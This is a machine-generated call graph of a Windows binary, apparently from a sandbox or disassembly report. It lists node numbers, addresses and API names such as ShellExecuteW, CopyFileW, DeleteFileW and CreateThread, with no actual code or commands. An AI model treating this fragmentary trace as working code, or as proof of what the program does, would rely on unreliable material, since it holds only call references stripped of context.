26 API calls 97148->97149 97148->97152 97150 acdc43 97149->97150 97174 ad59be 97150->97174 97153 ad4d7a 97152->97153 97154 ad4d90 97153->97154 97156 ace640 97153->97156 97155 ad29c8 _free 20 API calls 97154->97155 97154->97156 97155->97156 97156->97139 97158 ad863e 97157->97158 97159 ad8653 97157->97159 97297 acf2c6 20 API calls __dosmaperr 97158->97297 97161 ad868e 97159->97161 97166 ad867a 97159->97166 97299 acf2c6 20 API calls __dosmaperr 97161->97299 97163 ad8643 97298 acf2d9 20 API calls __dosmaperr 97163->97298 97164 ad8693 97300 acf2d9 20 API calls __dosmaperr 97164->97300 97294 ad8607 97166->97294 97169 ad869b 97301 ad27ec 26 API calls ___std_exception_copy 97169->97301 97170 ace64c 97170->97136 97170->97143 97172->97132 97173->97136 97175 ad59ca BuildCatchObjectHelperInternal 97174->97175 97176 ad59ea 97175->97176 97177 ad59d2 97175->97177 97179 ad5a88 97176->97179 97184 ad5a1f 97176->97184 97253 acf2c6 20 API calls __dosmaperr 97177->97253 97258 acf2c6 20 API calls __dosmaperr 97179->97258 97180 ad59d7 97254 acf2d9 20 API calls __dosmaperr 97180->97254 97183 ad5a8d 97259 acf2d9 20 API calls __dosmaperr 97183->97259 97199 ad5147 EnterCriticalSection 97184->97199 97185 ad59df __fread_nolock 97185->97152 97188 ad5a95 97260 ad27ec 26 API calls ___std_exception_copy 97188->97260 97189 ad5a25 97191 ad5a56 97189->97191 97192 ad5a41 97189->97192 97200 ad5aa9 97191->97200 97255 acf2d9 20 API calls __dosmaperr 97192->97255 97195 ad5a46 97256 acf2c6 20 API calls __dosmaperr 97195->97256 97196 ad5a51 97257 ad5a80 LeaveCriticalSection __wsopen_s 97196->97257 97199->97189 97201 ad5ad7 97200->97201 97238 ad5ad0 97200->97238 97202 ad5adb 97201->97202 97203 ad5afa 97201->97203 97268 acf2c6 20 API calls __dosmaperr 97202->97268 97207 ad5b4b 97203->97207 97208 ad5b2e 97203->97208 97206 ad5ae0 97269 acf2d9 20 API calls __dosmaperr 97206->97269 97217 ad5b61 97207->97217 97274 ad9424 28 API calls __wsopen_s 97207->97274 97271 acf2c6 20 API calls __dosmaperr 97208->97271 97209 ad5cb1 97209->97196 97212 ad5ae7 97270 ad27ec 26 API calls ___std_exception_copy 97212->97270 97215 ad5b33 97272 acf2d9 20 API calls __dosmaperr 97215->97272 97261 ad564e 97217->97261 97220 ad5b6f 97221 ad5ba8 97222 ad5b3b 97273 ad27ec 26 API calls ___std_exception_copy 97222->97273 97285 ac0a8c 97238->97285 97253->97180 97254->97185 97255->97195 97256->97196 97257->97185 97258->97183 97259->97188 97260->97185 97262 adf89b __fread_nolock 26 API calls 97261->97262 97264 ad565e 97262->97264 97263 ad5663 97263->97220 97263->97221 97264->97263 97292 ad2d74 38 API calls 2 library calls 97264->97292 97266 ad5686 97266->97263 97267 ad56a4 GetConsoleMode 97266->97267 97267->97263 97268->97206 97269->97212 97270->97238 97271->97215 97272->97222 97273->97238 97274->97217 97286 ac0a95 97285->97286 97287 ac0a97 IsProcessorFeaturePresent 97285->97287 97286->97209 97289 ac0c5d 97287->97289 97293 ac0c21 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 97289->97293 97291 ac0d40 97291->97209 97292->97266 97293->97291 97302 ad8585 97294->97302 97296 ad862b 97296->97170 97297->97163 97298->97170 97299->97164 97300->97169 97301->97170 97303 ad8591 BuildCatchObjectHelperInternal 97302->97303 97313 ad5147 EnterCriticalSection 97303->97313 97305 ad859f 97306 ad85c6 97305->97306 97307 ad85d1 97305->97307 97314 ad86ae 97306->97314 97329 acf2d9 20 API calls __dosmaperr 97307->97329 97310 ad85cc 97330 ad85fb LeaveCriticalSection __wsopen_s 97310->97330 97312 ad85ee __fread_nolock 97312->97296 97313->97305 97331 ad53c4 97314->97331 97316 ad86c4 97317 ad86be 97317->97316 97318 ad86f6 97317->97318 97320 ad53c4 __wsopen_s 26 API calls 97317->97320 97318->97316 97329->97310 97330->97312 97332 ad53d1 97331->97332 97335 ad53e6 97331->97335 97333 acf2c6 __dosmaperr 20 API calls 97332->97333 97334 ad53d6 97333->97334 97337 acf2d9 __dosmaperr 20 API calls 97334->97337 97336 acf2c6 __dosmaperr 20 API calls 97335->97336 97338 ad540b 97335->97338 97339 ad5416 97336->97339 97338->97317 97341 acf2d9 __dosmaperr 20 API calls 97339->97341 97346->96555 97347 ae2ba5 97348 ae2baf 97347->97348 97349 aa2b25 97347->97349 97381 aa3a5a 97348->97381 97375 aa2b83 7 API calls 97349->97375 97353 ae2bb8 97388 aa9cb3 97353->97388 97356 aa2b2f 97366 aa2b44 97356->97366 97379 aa3837 49 API calls ___scrt_fastfail 97356->97379 97357 ae2bc6 97358 ae2bce 97357->97358 97359 ae2bf5 97357->97359 97394 aa33c6 97358->97394 97362 aa33c6 22 API calls 97359->97362 97363 ae2bf1 GetForegroundWindow ShellExecuteW 97362->97363 97369 ae2c26 97363->97369 97367 aa2b5f 97366->97367 97380 aa30f2 Shell_NotifyIconW ___scrt_fastfail 97366->97380 97373 aa2b66 SetCurrentDirectoryW 97367->97373 97369->97367 97372 aa33c6 22 API calls 97372->97363 97374 aa2b7a 97373->97374 97412 aa2cd4 7 API calls 97375->97412 97377 aa2b2a 97378 aa2c63 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 97377->97378 97378->97356 97379->97366 97380->97367 97382 ae1f50 __wsopen_s 97381->97382 97383 aa3a67 GetModuleFileNameW 97382->97383 97384 aa9cb3 22 API calls 97383->97384 97385 aa3a8d 97384->97385 97386 aa3aa2 23 API calls 97385->97386 97387 aa3a97 97386->97387 97387->97353 97389 aa9cc2 _wcslen 97388->97389 97390 abfe0b 22 API calls 97389->97390 97391 aa9cea __fread_nolock 97390->97391 97392 abfddb 22 API calls 97391->97392 97393 aa9d00 97392->97393 97393->97357 97395 ae30bb 97394->97395 97396 aa33dd 97394->97396 97398 abfddb 22 API calls 97395->97398 97413 aa33ee 97396->97413 97400 ae30c5 _wcslen 97398->97400 97399 aa33e8 97403 aa6350 97399->97403 97401 abfe0b 22 API calls 97400->97401 97402 ae30fe __fread_nolock 97401->97402 97404 aa6362 97403->97404 97405 ae4a51 97403->97405 97428 aa6373 97404->97428 97438 aa4a88 22 API calls __fread_nolock 97405->97438 97408 aa636e 97408->97372 97409 ae4a5b 97410 ae4a67 97409->97410 97439 aaa8c7 97409->97439 97412->97377 97414 aa33fe _wcslen 97413->97414 97415 ae311d 97414->97415 97416 aa3411 97414->97416 97417 abfddb 22 API calls 97415->97417 97423 aaa587 97416->97423 97419 ae3127 97417->97419 97421 abfe0b 22 API calls 97419->97421 97420 aa341e __fread_nolock 97420->97399 97422 ae3157 __fread_nolock 97421->97422 97424 aaa59d 97423->97424 97427 aaa598 __fread_nolock 97423->97427 97425 aef80f 97424->97425 97426 abfe0b 22 API calls 97424->97426 97426->97427 97427->97420 97429 aa6382 97428->97429 97435 aa63b6 __fread_nolock 97428->97435 97430 ae4a82 97429->97430 97431 aa63a9 97429->97431 97429->97435 97432 abfddb 22 API calls 97430->97432 97433 aaa587 22 API calls 97431->97433 97434 ae4a91 97432->97434 97433->97435 97436 abfe0b 22 API calls 97434->97436 97435->97408 97437 ae4ac5 __fread_nolock 97436->97437 97438->97409 97440 aaa8ea __fread_nolock 97439->97440 97441 aaa8db 97439->97441 97440->97410 97441->97440 97442 abfe0b 22 API calls 97441->97442 97442->97440 97443 aa1044 97448 aa10f3 97443->97448 97445 aa104a 97484 ac00a3 29 API calls __onexit 97445->97484 97447 aa1054 97485 aa1398 97448->97485 97452 aa116a 97453 aaa961 22 API calls 97452->97453 97454 aa1174 97453->97454 97455 aaa961 22 API calls 97454->97455 97456 aa117e 97455->97456 97457 aaa961 22 API calls 97456->97457 97458 aa1188 97457->97458 97459 aaa961 22 API calls 97458->97459 97460 aa11c6 97459->97460 97461 aaa961 22 API calls 97460->97461 97462 aa1292 97461->97462 97495 aa171c 97462->97495 97466 aa12c4 97467 aaa961 22 API calls 97466->97467 97468 aa12ce 97467->97468 97516 ab1940 97468->97516 97470 aa12f9 97526 aa1aab 97470->97526 97472 aa1315 97473 aa1325 GetStdHandle 97472->97473 97474 aa137a 97473->97474 97475 ae2485 97473->97475 97478 aa1387 OleInitialize 97474->97478 97475->97474 97476 ae248e 97475->97476 97477 abfddb 22 API calls 97476->97477 97479 ae2495 97477->97479 97478->97445 97533 b1011d InitializeCriticalSectionAndSpinCount InterlockedExchange GetCurrentProcess GetCurrentProcess DuplicateHandle 97479->97533 97481 ae249e 97534 b10944 CreateThread 97481->97534 97483 ae24aa CloseHandle 97483->97474 97484->97447 97535 aa13f1 97485->97535 97488 aa13f1 22 API calls 97489 aa13d0 97488->97489 97490 aaa961 22 API calls 97489->97490 97491 aa13dc 97490->97491 97492 aa6b57 22 API calls 97491->97492 97493 aa1129 97492->97493 97494 aa1bc3 6 API calls 97493->97494 97494->97452 97496 aaa961 22 API calls 97495->97496 97497 aa172c 97496->97497 97498 aaa961 22 API calls 97497->97498 97499 aa1734 97498->97499 97500 aaa961 22 API calls 97499->97500 97501 aa174f 97500->97501 97502 abfddb 22 API calls 97501->97502 97503 aa129c 97502->97503 97504 aa1b4a 97503->97504 97505 aa1b58 97504->97505 97506 aaa961 22 API calls 97505->97506 97507 aa1b63 97506->97507 97508 aaa961 22 API calls 97507->97508 97509 aa1b6e 97508->97509 97510 aaa961 22 API calls 97509->97510 97511 aa1b79 97510->97511 97512 aaa961 22 API calls 97511->97512 97513 aa1b84 97512->97513 97514 abfddb 22 API calls 97513->97514 97515 aa1b96 RegisterWindowMessageW 97514->97515 97515->97466 97517 ab195d 97516->97517 97518 ab1981 97516->97518 97525 ab196e 97517->97525 97544 ac0242 5 API calls __Init_thread_wait 97517->97544 97542 ac0242 5 API calls __Init_thread_wait 97518->97542 97520 ab198b 97520->97517 97543 ac01f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 97520->97543 97522 ab8727 97522->97525 97545 ac01f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 97522->97545 97525->97470 97527 aa1abb 97526->97527 97528 ae272d 97526->97528 97529 abfddb 22 API calls 97527->97529 97546 b13209 23 API calls 97528->97546 97531 aa1ac3 97529->97531 97531->97472 97532 ae2738 97533->97481 97534->97483 97547 b1092a 28 API calls 97534->97547 97536 aaa961 22 API calls 97535->97536 97537 aa13fc 97536->97537 97538 aaa961 22 API calls 97537->97538 97539 aa1404 97538->97539 97540 aaa961 22 API calls 97539->97540 97541 aa13c6 97540->97541 97541->97488 97542->97520 97543->97517 97544->97522 97545->97525 97546->97532 97548 af3a41 97552 b110c0 97548->97552 97550 af3a4c 97551 b110c0 53 API calls 97550->97551 97551->97550 97553 b110fa 97552->97553 97558 b110cd 97552->97558 97553->97550 97554 b110fc 97587 abfa11 53 API calls 97554->97587 97556 b11101 97563 aa7510 97556->97563 97558->97553 97558->97554 97558->97556 97561 b110f4 97558->97561 97560 aa6350 22 API calls 97560->97553 97586 aab270 39 API calls 97561->97586 97564 aa7522 97563->97564 97565 aa7525 97563->97565 97564->97560 97566 aa755b 97565->97566 97567 aa752d 97565->97567 97568 ae50f6 97566->97568 97570 aa756d 97566->97570 97578 ae500f 97566->97578 97588 ac51c6 26 API calls 97567->97588 97591 ac5183 26 API calls 97568->97591 97589 abfb21 51 API calls 97570->97589 97571 aa753d 97576 abfddb 22 API calls 97571->97576 97573 ae510e 97573->97573 97579 aa7547 97576->97579 97577 ae5088 97590 abfb21 51 API calls 97577->97590 97578->97577 97581 abfe0b 22 API calls 97578->97581 97580 aa9cb3 22 API calls 97579->97580 97580->97564 97582 ae5058 97581->97582 97583 abfddb 22 API calls 97582->97583 97584 ae507f 97583->97584 97585 aa9cb3 22 API calls 97584->97585 97585->97577 97586->97553 97587->97556 97588->97571 97589->97571 97590->97568 97591->97573 97592 af2a00 97606 aad7b0 ISource 97592->97606 97593 aadb11 PeekMessageW 97593->97606 97594 aad807 GetInputState 97594->97593 97594->97606 97596 af1cbe TranslateAcceleratorW 97596->97606 97597 aada04 timeGetTime 97597->97606 97598 aadb8f PeekMessageW 97598->97606 97599 aadb73 TranslateMessage DispatchMessageW 97599->97598 97600 aadbaf Sleep 97618 aadbc0 97600->97618 97601 af2b74 Sleep 97601->97618 97602 abe551 timeGetTime 97602->97618 97603 af1dda timeGetTime 97765 abe300 23 API calls 97603->97765 97606->97593 97606->97594 97606->97596 97606->97597 97606->97598 97606->97599 97606->97600 97606->97601 97606->97603 97611 aad9d5 97606->97611 97624 aadfd0 97606->97624 97647 ab1310 97606->97647 97701 abedf6 97606->97701 97706 aadd50 235 API calls 97606->97706 97707 aabf40 97606->97707 97766 b13a2a 23 API calls 97606->97766 97767 aaec40 97606->97767 97791 b1359c 82 API calls __wsopen_s 97606->97791 97607 af2c0b GetExitCodeProcess 97609 af2c37 CloseHandle 97607->97609 97610 af2c21 WaitForSingleObject 97607->97610 97609->97618 97610->97606 97610->97609 97612 af2a31 97612->97611 97613 b329bf GetForegroundWindow 97613->97618 97614 af2ca9 Sleep 97614->97606 97618->97602 97618->97606 97618->97607 97618->97611 97618->97612 97618->97613 97618->97614 97792 b25658 23 API calls 97618->97792 97793 b0e97b QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 97618->97793 97794 b0d4dc 47 API calls 97618->97794 97625 aae010 97624->97625 97643 aae0dc ISource 97625->97643 97797 ac0242 5 API calls __Init_thread_wait 97625->97797 97628 af2fca 97631 aaa961 22 API calls 97628->97631 97628->97643 97629 aaa961 22 API calls 97629->97643 97630 b1359c 82 API calls 97630->97643 97633 af2fe4 97631->97633 97798 ac00a3 29 API calls __onexit 97633->97798 97636 af2fee 97799 ac01f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 97636->97799 97640 aaec40 235 API calls 97640->97643 97641 aaa8c7 22 API calls 97641->97643 97642 ab04f0 22 API calls 97642->97643 97643->97629 97643->97630 97643->97640 97643->97641 97643->97642 97644 aae3e1 97643->97644 97795 aaa81b 41 API calls 97643->97795 97796 aba308 235 API calls 97643->97796 97800 ac0242 5 API calls __Init_thread_wait 97643->97800 97801 ac00a3 29 API calls __onexit 97643->97801 97802 ac01f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 97643->97802 97803 b247d4 235 API calls 97643->97803 97804 b268c1 235 API calls 97643->97804 97644->97606 97648 ab17b0 97647->97648 97649 ab1376 97647->97649 97904 ac0242 5 API calls __Init_thread_wait 97648->97904 97650 ab1390 97649->97650 97651 af6331 97649->97651 97653 ab1940 9 API calls 97650->97653 97654 af633d 97651->97654 97918 b2709c 235 API calls 97651->97918 97657 ab13a0 97653->97657 97654->97606 97656 ab17ba 97658 ab17fb 97656->97658 97660 aa9cb3 22 API calls 97656->97660 97659 ab1940 9 API calls 97657->97659 97662 af6346 97658->97662 97664 ab182c 97658->97664 97661 ab13b6 97659->97661 97668 ab17d4 97660->97668 97661->97658 97663 ab13ec 97661->97663 97919 b1359c 82 API calls __wsopen_s 97662->97919 97663->97662 97684 ab1408 __fread_nolock 97663->97684 97906 aaaceb 97664->97906 97667 ab1839 97916 abd217 235 API calls 97667->97916 97905 ac01f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 97668->97905 97671 af636e 97920 b1359c 82 API calls __wsopen_s 97671->97920 97673 ab153c 97675 ab1940 9 API calls 97673->97675 97674 af63d1 97922 b25745 54 API calls _wcslen 97674->97922 97677 ab1549 97675->97677 97685 ab1940 9 API calls 97677->97685 97695 ab15c7 ISource 97677->97695 97678 abfddb 22 API calls 97678->97684 97679 ab1563 97694 aaa8c7 22 API calls 97679->97694 97679->97695 97680 abfe0b 22 API calls 97680->97684 97681 ab167b ISource 97686 ab171d 97681->97686 97903 abce17 22 API calls ISource 97681->97903 97682 ab1872 97917 abfaeb 23 API calls 97682->97917 97684->97667 97684->97671 97684->97678 97684->97680 97688 aaec40 235 API calls 97684->97688 97689 ab152f 97684->97689 97692 af63b2 97684->97692 97684->97695 97685->97679 97686->97606 97688->97684 97689->97673 97689->97674 97691 ab1940 9 API calls 97691->97695 97921 b1359c 82 API calls __wsopen_s 97692->97921 97694->97695 97695->97681 97695->97682 97695->97691 97805 b0d4ce 97695->97805 97808 b16ef1 97695->97808 97888 b2958b 97695->97888 97891 b1f0ec 97695->97891 97900 b2959f 97695->97900 97923 b1359c 82 API calls __wsopen_s 97695->97923 97702 abee09 97701->97702 97703 abee12 97701->97703 97702->97606 97703->97702 97704 abee36 IsDialogMessageW 97703->97704 97705 afefaf GetClassLongW 97703->97705 97704->97702 97704->97703 97705->97703 97705->97704 97706->97606 98242 aaadf0 97707->98242 97709 aabf9d 97710 aabfa9 97709->97710 97711 af04b6 97709->97711 97712 af04c6 97710->97712 97713 aac01e 97710->97713 98270 b1359c 82 API calls __wsopen_s 97711->98270 98271 b1359c 82 API calls __wsopen_s 97712->98271 98247 aaac91 97713->98247 97717 af04f5 97718 af055a 97717->97718 98272 abd217 235 API calls 97717->98272 97751 aac603 97718->97751 98273 b1359c 82 API calls __wsopen_s 97718->98273 97720 b07120 22 API calls 97762 aac039 ISource __fread_nolock 97720->97762 97722 aac7da 97724 abfe0b 22 API calls 97722->97724 97731 aac808 __fread_nolock 97724->97731 97728 abfe0b 22 API calls 97763 aac350 ISource __fread_nolock 97728->97763 97729 aaaf8a 22 API calls 97729->97762 97730 af091a 98282 b13209 23 API calls 97730->98282 97731->97728 97734 aaec40 235 API calls 97734->97762 97735 af08a5 97736 aaec40 235 API calls 97735->97736 97737 af08cf 97736->97737 97737->97751 98280 aaa81b 41 API calls 97737->98280 97739 af0591 98274 b1359c 82 API calls __wsopen_s 97739->98274 97740 af08f6 98281 b1359c 82 API calls __wsopen_s 97740->98281 97745 abfddb 22 API calls 97745->97762 97746 aac237 97748 aac253 97746->97748 97750 aaa8c7 22 API calls 97746->97750 97747 aaaceb 23 API calls 97747->97762 97752 af0976 97748->97752 97755 aac297 ISource 97748->97755 97749 abfe0b 22 API calls 97749->97762 97750->97748 97751->97606 97754 aaaceb 23 API calls 97752->97754 97757 af09bf 97754->97757 97756 aaaceb 23 API calls 97755->97756 97755->97757 97758 aac335 97756->97758 97757->97751 98283 b1359c 82 API calls __wsopen_s 97757->98283 97758->97757 97759 aac342 97758->97759 98258 aaa704 97759->98258 97760 aabbe0 40 API calls 97760->97762 97762->97717 97762->97718 97762->97720 97762->97722 97762->97729 97762->97730 97762->97731 97762->97734 97762->97735 97762->97739 97762->97740 97762->97745 97762->97746 97762->97747 97762->97749 97762->97751 97762->97757 97762->97760 98251 aaad81 97762->98251 98275 b07099 22 API calls __fread_nolock 97762->98275 98276 b25745 54 API calls _wcslen 97762->98276 98277 abaa42 22 API calls ISource 97762->98277 98278 b0f05c 40 API calls 97762->98278 98279 aaa993 41 API calls 97762->98279 97764 aac3ac 97763->97764 98269 abce17 22 API calls ISource 97763->98269 97764->97606 97765->97606 97766->97606 97778 aaec76 ISource 97767->97778 97768 abfddb 22 API calls 97768->97778 97769 ac0242 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 97769->97778 97770 ac01f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent __Init_thread_footer 97770->97778 97771 af4beb 98324 b1359c 82 API calls __wsopen_s 97771->98324 97772 aafef7 97780 aaa8c7 22 API calls 97772->97780 97784 aaed9d ISource 97772->97784 97775 af4600 97782 aaa8c7 22 API calls 97775->97782 97775->97784 97776 af4b0b 98322 b1359c 82 API calls __wsopen_s 97776->98322 97777 aaa8c7 22 API calls 97777->97778 97778->97768 97778->97769 97778->97770 97778->97771 97778->97772 97778->97775 97778->97776 97778->97777 97778->97784 97785 aafbe3 97778->97785 97786 aaa961 22 API calls 97778->97786 97788 ac00a3 29 API calls pre_c_initialization 97778->97788 97790 aaf3ae ISource 97778->97790 98306 ab06a0 97778->98306 98320 ab01e0 235 API calls 2 library calls 97778->98320 97780->97784 97782->97784 97784->97606 97785->97784 97787 af4bdc 97785->97787 97785->97790 97786->97778 98323 b1359c 82 API calls __wsopen_s 97787->98323 97788->97778 97790->97784 98321 b1359c 82 API calls __wsopen_s 97790->98321 97791->97606 97792->97618 97793->97618 97794->97618 97795->97643 97796->97643 97797->97628 97798->97636 97799->97643 97800->97643 97801->97643 97802->97643 97803->97643 97804->97643 97924 b0dbbe lstrlenW 97805->97924 97809 aaa961 22 API calls 97808->97809 97810 b16f1d 97809->97810 97811 aaa961 22 API calls 97810->97811 97812 b16f26 97811->97812 97813 b16f3a 97812->97813 98083 aab567 39 API calls 97812->98083 97815 aa7510 53 API calls 97813->97815 97822 b16f57 _wcslen 97815->97822 97816 b16fbc 97818 aa7510 53 API calls 97816->97818 97817 b170bf 97819 aa4ecb 94 API calls 97817->97819 97820 b16fc8 97818->97820 97821 b170d0 97819->97821 97825 aaa8c7 22 API calls 97820->97825 97831 b16fdb 97820->97831 97823 b170e5 97821->97823 97826 aa4ecb 94 API calls 97821->97826 97822->97816 97822->97817 97827 b170e9 97822->97827 97824 aaa961 22 API calls 97823->97824 97823->97827 97828 b1711a 97824->97828 97825->97831 97826->97823 97827->97695 97829 aaa961 22 API calls 97828->97829 97833 b17126 97829->97833 97830 b17027 97832 aa7510 53 API calls 97830->97832 97831->97830 97834 b17005 97831->97834 97837 aaa8c7 22 API calls 97831->97837 97835 b17034 97832->97835 97836 aaa961 22 API calls 97833->97836 97838 aa33c6 22 API calls 97834->97838 97839 b17047 97835->97839 97840 b1703d 97835->97840 97841 b1712f 97836->97841 97837->97834 97842 b1700f 97838->97842 98084 b0e199 GetFileAttributesW 97839->98084 97844 aaa8c7 22 API calls 97840->97844 97846 aaa961 22 API calls 97841->97846 97843 aa7510 53 API calls 97842->97843 97847 b1701b 97843->97847 97844->97839 97849 b17138 97846->97849 97850 aa6350 22 API calls 97847->97850 97848 b17050 97851 b17063 97848->97851 97854 aa4c6d 22 API calls 97848->97854 97852 aa7510 53 API calls 97849->97852 97850->97830 97853 aa7510 53 API calls 97851->97853 97861 b17069 97851->97861 97855 b17145 97852->97855 97856 b170a0 97853->97856 97854->97851 97929 aa525f 97855->97929 98085 b0d076 57 API calls 97856->98085 97859 b17166 97971 aa4c6d 97859->97971 97861->97827 97863 b171a9 97865 aaa8c7 22 API calls 97863->97865 97864 aa4c6d 22 API calls 97866 b17186 97864->97866 97867 b171ba 97865->97867 97866->97863 97869 aa6b57 22 API calls 97866->97869 97868 aa6350 22 API calls 97867->97868 97870 b171c8 97868->97870 97871 b1719b 97869->97871 97872 aa6350 22 API calls 97870->97872 97873 aa6b57 22 API calls 97871->97873 97874 b171d6 97872->97874 97873->97863 97875 aa6350 22 API calls 97874->97875 97876 b171e4 97875->97876 97877 aa7510 53 API calls 97876->97877 97878 b171f0 97877->97878 97974 b0d7bc 97878->97974 97880 b17201 97881 b0d4ce 4 API calls 97880->97881 97882 b1720b 97881->97882 97883 aa7510 53 API calls 97882->97883 97887 b17239 97882->97887 97884 b17229 97883->97884 98028 b12947 97884->98028 97886 aa4f39 68 API calls 97886->97827 97887->97886 98109 b27f59 97888->98109 97890 b2959b 97890->97695 97892 aa7510 53 API calls 97891->97892 97893 b1f126 97892->97893 98200 aa9e90 97893->98200 97895 b1f136 97896 b1f15b 97895->97896 97897 aaec40 235 API calls 97895->97897 97899 b1f15f 97896->97899 98228 aa9c6e 22 API calls 97896->98228 97897->97896 97899->97695 97901 b27f59 120 API calls 97900->97901 97902 b295af 97901->97902 97902->97695 97903->97681 97904->97656 97905->97658 97907 aaacf9 97906->97907 97915 aaad2a ISource 97906->97915 97908 aaad55 97907->97908 97910 aaad01 ISource 97907->97910 97909 aaa8c7 22 API calls 97908->97909 97908->97915 97909->97915 97911 aefa48 97910->97911 97912 aaad21 97910->97912 97910->97915 97911->97915 98241 abce17 22 API calls ISource 97911->98241 97914 aefa3a VariantClear 97912->97914 97912->97915 97914->97915 97915->97667 97916->97682 97917->97682 97918->97654 97919->97695 97920->97695 97921->97695 97922->97679 97923->97695 97925 b0d4d5 97924->97925 97926 b0dbdc GetFileAttributesW 97924->97926 97925->97695 97926->97925 97927 b0dbe8 FindFirstFileW 97926->97927 97927->97925 97928 b0dbf9 FindClose 97927->97928 97928->97925 97930 aaa961 22 API calls 97929->97930 97931 aa5275 97930->97931 97932 aaa961 22 API calls 97931->97932 97933 aa527d 97932->97933 97934 aaa961 22 API calls 97933->97934 97935 aa5285 97934->97935 97936 aaa961 22 API calls 97935->97936 97937 aa528d 97936->97937 97938 ae3df5 97937->97938 97939 aa52c1 97937->97939 97940 aaa8c7 22 API calls 97938->97940 97941 aa6d25 22 API calls 97939->97941 97942 ae3dfe 97940->97942 97943 aa52cf 97941->97943 97944 aaa6c3 22 API calls 97942->97944 97945 aa93b2 22 API calls 97943->97945 97949 aa5304 97944->97949 97946 aa52d9 97945->97946 97947 aa6d25 22 API calls 97946->97947 97946->97949 97951 aa52fa 97947->97951 97948 aa5349 98086 aa6d25 97948->98086 97949->97948 97952 aa5325 97949->97952 97955 ae3e20 97949->97955 97954 aa93b2 22 API calls 97951->97954 97952->97948 97957 aa4c6d 22 API calls 97952->97957 97953 aa535a 97956 aa5370 97953->97956 97961 aaa8c7 22 API calls 97953->97961 97954->97949 97960 aa6b57 22 API calls 97955->97960 97958 aa5384 97956->97958 97964 aaa8c7 22 API calls 97956->97964 97959 aa5332 97957->97959 97962 aa538f 97958->97962 97966 aaa8c7 22 API calls 97958->97966 97959->97948 97965 aa6d25 22 API calls 97959->97965 97963 ae3ee0 97960->97963 97961->97956 97967 aaa8c7 22 API calls 97962->97967 97969 aa539a 97962->97969 97963->97948 97968 aa4c6d 22 API calls 97963->97968 98099 aa49bd 22 API calls __fread_nolock 97963->98099 97964->97958 97965->97948 97966->97962 97967->97969 97968->97963 97969->97859 97972 aaaec9 22 API calls 97971->97972 97973 aa4c78 97972->97973 97973->97863 97973->97864 97975 b0d7d8 97974->97975 97976 b0d7f3 97975->97976 97977 b0d7dd 97975->97977 97978 aaa961 22 API calls 97976->97978 97979 aaa8c7 22 API calls 97977->97979 98027 b0d7ee 97977->98027 97980 b0d7fb 97978->97980 97979->98027 97981 aaa961 22 API calls 97980->97981 97982 b0d803 97981->97982 97983 aaa961 22 API calls 97982->97983 97984 b0d80e 97983->97984 97985 aaa961 22 API calls 97984->97985 97986 b0d816 97985->97986 97987 aaa961 22 API calls 97986->97987 97988 b0d81e 97987->97988 97989 aaa961 22 API calls 97988->97989 97990 b0d826 97989->97990 97991 aaa961 22 API calls 97990->97991 97992 b0d82e 97991->97992 97993 aaa961 22 API calls 97992->97993 97994 b0d836 97993->97994 97995 aa525f 22 API calls 97994->97995 97996 b0d84d 97995->97996 97997 aa525f 22 API calls 97996->97997 97998 b0d866 97997->97998 97999 aa4c6d 22 API calls 97998->97999 98000 b0d872 97999->98000 98001 b0d885 98000->98001 98002 aa93b2 22 API calls 98000->98002 98003 aa4c6d 22 API calls 98001->98003 98002->98001 98004 b0d88e 98003->98004 98005 b0d89e 98004->98005 98006 aa93b2 22 API calls 98004->98006 98007 b0d8b0 98005->98007 98008 aaa8c7 22 API calls 98005->98008 98006->98005 98009 aa6350 22 API calls 98007->98009 98008->98007 98010 b0d8bb 98009->98010 98101 b0d978 22 API calls 98010->98101 98012 b0d8ca 98102 b0d978 22 API calls 98012->98102 98014 b0d8dd 98015 aa4c6d 22 API calls 98014->98015 98016 b0d8e7 98015->98016 98017 b0d8ec 98016->98017 98018 b0d8fe 98016->98018 98020 aa33c6 22 API calls 98017->98020 98019 aa4c6d 22 API calls 98018->98019 98021 b0d907 98019->98021 98022 b0d8f9 98020->98022 98023 b0d925 98021->98023 98024 aa33c6 22 API calls 98021->98024 98025 aa6350 22 API calls 98022->98025 98026 aa6350 22 API calls 98023->98026 98024->98022 98025->98023 98026->98027 98027->97880 98029 b12954 __wsopen_s 98028->98029 98030 abfe0b 22 API calls 98029->98030 98031 b12971 98030->98031 98032 aa5722 22 API calls 98031->98032 98033 b1297b 98032->98033 98034 b1274e 27 API calls 98033->98034 98035 b12986 98034->98035 98036 aa511f 64 API calls 98035->98036 98037 b1299b 98036->98037 98038 b12a6c 98037->98038 98039 b129bf 98037->98039 98040 b12e66 75 API calls 98038->98040 98041 b12e66 75 API calls 98039->98041 98056 b12a38 98040->98056 98042 b129c4 98041->98042 98046 b12a75 ISource 98042->98046 98107 acd583 26 API calls 98042->98107 98044 aa50f5 40 API calls 98045 b12a91 98044->98045 98047 aa50f5 40 API calls 98045->98047 98046->97887 98049 b12aa1 98047->98049 98048 b129ed 98108 acd583 26 API calls 98048->98108 98050 aa50f5 40 API calls 98049->98050 98052 b12abc 98050->98052 98053 aa50f5 40 API calls 98052->98053 98054 b12acc 98053->98054 98055 aa50f5 40 API calls 98054->98055 98057 b12ae7 98055->98057 98056->98044 98056->98046 98058 aa50f5 40 API calls 98057->98058 98059 b12af7 98058->98059 98060 aa50f5 40 API calls 98059->98060 98061 b12b07 98060->98061 98062 aa50f5 40 API calls 98061->98062 98063 b12b17 98062->98063 98103 b13017 GetTempPathW GetTempFileNameW 98063->98103 98065 b12b22 98066 ace5eb 29 API calls 98065->98066 98077 b12b33 98066->98077 98067 b12bed 98068 ace678 67 API calls 98067->98068 98069 b12bf8 98068->98069 98071 b12c12 98069->98071 98072 b12bfe DeleteFileW 98069->98072 98070 aa50f5 40 API calls 98070->98077 98073 b12c91 CopyFileW 98071->98073 98079 b12c18 98071->98079 98072->98046 98074 b12ca7 DeleteFileW 98073->98074 98075 b12cb9 DeleteFileW 98073->98075 98074->98046 98104 b12fd8 CreateFileW 98075->98104 98077->98046 98077->98067 